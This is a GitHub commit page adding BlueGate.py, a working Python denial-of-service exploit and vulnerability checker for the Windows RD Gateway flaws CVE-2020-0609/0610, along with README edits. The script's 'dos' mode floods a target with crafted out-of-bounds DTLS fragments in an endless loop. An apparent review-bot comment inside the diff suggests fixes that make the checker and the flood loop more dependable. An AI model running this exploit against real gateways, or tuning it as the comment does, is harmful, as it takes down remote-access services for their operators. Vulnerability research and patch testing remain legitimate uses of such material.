ollypwn
committed
Jan 24, 2020
1 parent
62416fc
commit 3665147
Showing
10 changed files
with
220 additions
and
13 deletions.
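--- /dev/null
+++ b/BlueGate.py
@@ -0,0 +1,148 @@
+#!/bin/env python3
+from cryptography.hazmat.bindings.openssl.binding import Binding
+from OpenSSL import SSL
+import argparse
+import os
+import select
+import signal
+import socket
+import struct
+import sys
+
+TIMEOUT = 3
+
+def init_dtls():
+    binding = Binding()
+    binding.init_static_locks()
+    SSL.Context._methods[0]= getattr(binding.lib, "DTLSv1_client_method")
+
+def log_info(s):
+    print(f"\033[96m[*] {s}\033[0m")
+
+def log_success(s):
+    print(f"\033[92m[+] {s}\033[0m")
+
+def log_error(s):
+    print(f"\033[91m[-] {s}\033[0m")
+
+class Packet:
+    def __init__(self, fragment_id = 0, no_of_fragments = 1, fragment_length = 0, fragment = b""):
+        self.fragment_id = fragment_id
+        self.no_of_fragments = no_of_fragments
+        self.fragment_length = fragment_length
+        self.fragment = fragment
+        self.pkt_ID = 5
+        self.pkt_Len = 0
+
+    def update_pkt_Len(self):
+        self.pkt_Len = len(self.fragment) + 6
+
+    def __bytes__(self):
+        self.update_pkt_Len()
+
+        buf = b""
+        buf += struct.pack("<HHHHH",
+            self.pkt_ID,
+            self.pkt_Len,
+            self.fragment_id,
+            self.no_of_fragments,
+            self.fragment_length)
+        buf += self.fragment
+
+        return buf
+
+class Connection:
+    def __init__(self, host = None, port = None, shouldConnect = True):
+        self.host = host
+        self.port = port
+        self.shouldConnect = shouldConnect
+
+        init_dtls()
+
+        signal.signal(signal.SIGALRM, self.broken_connection)
+
+        self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+        self.connection = SSL.Connection(SSL.Context(0), self.socket)
+
+        if shouldConnect:
+            self.connect()
+
+    def broken_connection(self, signum, frame):
+        log_success("Connection not responding")
+        print(signum, frame)
+
+        try:
+            self.close()
+        except:
+            pass
+
+        sys.exit()
+
+    def connect(self):
+        signal.alarm(TIMEOUT)
+        try:
+            self.connection.connect((self.host, self.port))
+            self.connection.do_handshake()
+        except SSL.SysCallError:
+            log_error("Could not connect to RD Gateway")
+            sys.exit()
+        signal.alarm(0)
+
+    def send_dos_packet(self, id):
+        packet = Packet(
+            id, id, 1000, b"\x41"*1000
+        )
+        self.write(bytes(packet))
+
+    def is_vulnerable(self):
+        log_info(f"Checking if {self.host} is vulnerable...")
+
+        packet = Packet(
+            0, 65, 1, b"\x00"
+        )
+
+        self.write(bytes(packet))
+
+        ready = select.select([self.socket], [], [], TIMEOUT)
+        if ready[0]:
+            buf = self.read(16)
+            signal.alarm(0)
+            return not (0x8000ffff == struct.unpack('<L', buf[-4:])[0])
+
+        return True
+
+    def close(self):
+        self.connection.shutdown()
+
+    def write(self, buffer):
+        self.connection.send(buffer)
+
+    def read(self, size):
+        return self.connection.recv(1024)
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser()
+    parser.add_argument("-M", "--mode", choices=["check","dos"], required=True, type=str.lower, default=False, help="Mode")
+    parser.add_argument("-P","--port", default=3391, help="UDP port of RDG, default: 3391", required=False, type=int)
+    parser.add_argument("host", help="IP address of host")
+
+    args = parser.parse_args()
+
+    if args.mode == "check":
+        connection = Connection(args.host, args.port)
+        is_vulnerable = connection.is_vulnerable()
+
+        if is_vulnerable:
+            log_success("Host is vulnerable")
+        else:
+            log_error("Host is not vulnerable")
+
+    if args.mode == "dos":
+        log_info(f"Sending DoS packets to {args.host}...")
+
+        i = 0
+        while i > -1:
+            connection = Connection(args.host, args.port)
+            for n in range(4):
+                connection.send_dos_packet(i+n)
+            i += 1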
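Review bot: `is_vulnerable` reports a host as vulnerable when `select` times out with no reply at all (the trailing `return True`), so an unreachable host, a filtered UDP port or a single dropped datagram is printed as "Host is vulnerable"; silence from the gateway is not evidence of the bug and check mode should report it as inconclusive rather than positive. The same branch unpacks `buf[-4:]` with `struct.unpack('<L', ...)` without confirming the reply holds at least four bytes, and `read` ignores its `size` argument and always receives 1024, so a short reply dies with `struct.error` instead of a clear message. I would return `None` for both the timeout and short-reply cases and have the `check` branch in `__main__` print an "inconclusive" line when it gets `None` instead of treating it as a hit. Separately, the `dos` loop builds a fresh `Connection` (UDP socket plus DTLS handshake) on every iteration and never calls `close()`, so it will run the attacker host out of file descriptors long before the target is affected; reuse one connection or close each before opening the next.

```python
        ready = select.select([self.socket], [], [], TIMEOUT)
        if not ready[0]:
            # No datagram within TIMEOUT: unreachable, filtered or dropped -- not evidence of the bug.
            log_error("No response from host; result is inconclusive")
            return None
        buf = self.read(16)
        signal.alarm(0)
        if len(buf) < 4:
            log_error(f"Short reply ({len(buf)} bytes); result is inconclusive")
            return None
        return struct.unpack("<L", buf[-4:])[0] != 0x8000ffff
```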
@@ -1,27 +1,59 @@ | ||
# BlueGate | ||
Proof of Concept (Denial of Service) for CVE-2020-0609 and CVE-2020-0610. | ||
|
||
# BlueGate | ||
|
||
Proof of Concept (Denial of Service) for CVE-2020-0609 and CVE-2020-0610. | ||
|
||
|
||
|
||
These vulnerabilities allows an unauthenticated attacker to gain remote code execution with highest privileges via RD Gateway for RDP. | ||
|
||
|
||
|
||
Please use for research and educational purpose only. | ||
|
||
## Usage | ||
You must have the OpenSSL libraries and headers installed. The default location in the project settings is `C:\Program Files\OpenSSL-Win64`. If you don't have Visual Studio, you should make some minor changes in datatypes and socket initialization. | ||
|
||
|
||
## Usage | ||
Make sure you have [pyOpenSSL](https://www.pyopenssl.org/en/stable/) installed for python3. | ||
|
||
usage: BlueGate.py [-h] -M {check,dos} [-P PORT] host | ||
|
||
positional arguments: | ||
host IP address of host | ||
|
||
optional arguments: | ||
-h, --help show this help message and exit | ||
-M {check,dos}, --mode {check,dos} | ||
Mode | ||
-P PORT, --port PORT UDP port of RDG, default: 3391 | ||
|
||
|
||
|
||
## Vulnerability | ||
|
||
## Vulnerability | ||
The vulnerabilities allows an unauthenticated attacker to write forward out-of-bound in the heap, by specifying an unchecked and arbitrary index parameter `(0x00 - 0xFFFF)`. The data to write is also arbitrary with a length up to 1000 bytes at a time and a maximum of 4096 during one session. | ||
The vulnerabilities allows an unauthenticated attacker to write forward out-of-bound in the heap, by specifying an unchecked and arbitrary index parameter `(0x00 - 0xFFFF)`. The data to write is also arbitrary with a length up to 1000 bytes at a time and a maximum of 4096 during one session. | ||
|
||
|
||
|
||
If you would like to read more about the vulnerabilities, check [this](https://www.kryptoslogic.com/blog/2020/01/rdp-to-rce-when-fragmentation-goes-wrong/) or read my latest tweets on [Twitter](https://twitter.com/ollypwn) with a PoC video as well. | ||
|
||
## What is RD Gateway? | ||
RD Gateway acts as a proxy for RDP; i.e. between some internal servers and the internet, so you don't have to expose RDP directly to the internet. Inside `Release` you will find an already compiled executable. Note that as soon as the executable is running, it will connect to the server and start sending malicious packets, **so be careful**. | ||
|
||
|
||
## What is RD Gateway? | ||
|
||
.\BlueGate.exe <IP address> | ||
RD Gateway acts as a proxy for RDP; i.e. between some internal servers and the internet, so you don't have to expose RDP directly to the internet. | ||
|
||
## Why BlueGate? | ||
## Why BlueGate? | ||
|
||
|
||
|
||
That was just the working title, and I couldn't come up with a better one at this stage. | ||
|
||
## Todo: | ||
- Vulnerability scanner/checker | ||
- Python implementation | ||
|
||
|
||
## Todo: | ||
|
||
- ~~Vulnerability scanner/checker~~ **DONE** | ||
|
||
- ~~Python implementation~~ **DONE** | ||
|
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
@@ -0,0 +1,27 @@ | ||
# BlueGate | ||
Proof of Concept (Denial of Service) for CVE-2020-0609 and CVE-2020-0610. | ||
|
||
These vulnerabilities allows an unauthenticated attacker to gain remote code execution with highest privileges via RD Gateway for RDP. | ||
|
||
Please use for research and educational purpose only. | ||
|
||
## Usage | ||
You must have the OpenSSL libraries and headers installed. The default location in the project settings is `C:\Program Files\OpenSSL-Win64`. If you don't have Visual Studio, you should make some minor changes in datatypes and socket initialization. | ||
|
||
## Vulnerability | ||
The vulnerabilities allows an unauthenticated attacker to write forward out-of-bound in the heap, by specifying an unchecked and arbitrary index parameter `(0x00 - 0xFFFF)`. The data to write is also arbitrary with a length up to 1000 bytes at a time and a maximum of 4096 during one session. | ||
|
||
If you would like to read more about the vulnerabilities, check [this](https://www.kryptoslogic.com/blog/2020/01/rdp-to-rce-when-fragmentation-goes-wrong/) or read my latest tweets on [Twitter](https://twitter.com/ollypwn) with a PoC video as well. | ||
|
||
## What is RD Gateway? | ||
RD Gateway acts as a proxy for RDP; i.e. between some internal servers and the internet, so you don't have to expose RDP directly to the internet. Inside `Release` you will find an already compiled executable. Note that as soon as the executable is running, it will connect to the server and start sending malicious packets, **so be careful**. | ||
|
||
.\BlueGate.exe <IP address> | ||
|
||
## Why BlueGate? | ||
|
||
That was just the working title, and I couldn't come up with a better one at this stage. | ||
|
||
## Todo: | ||
- Vulnerability scanner/checker | ||
- Python implementation |
File renamed without changes.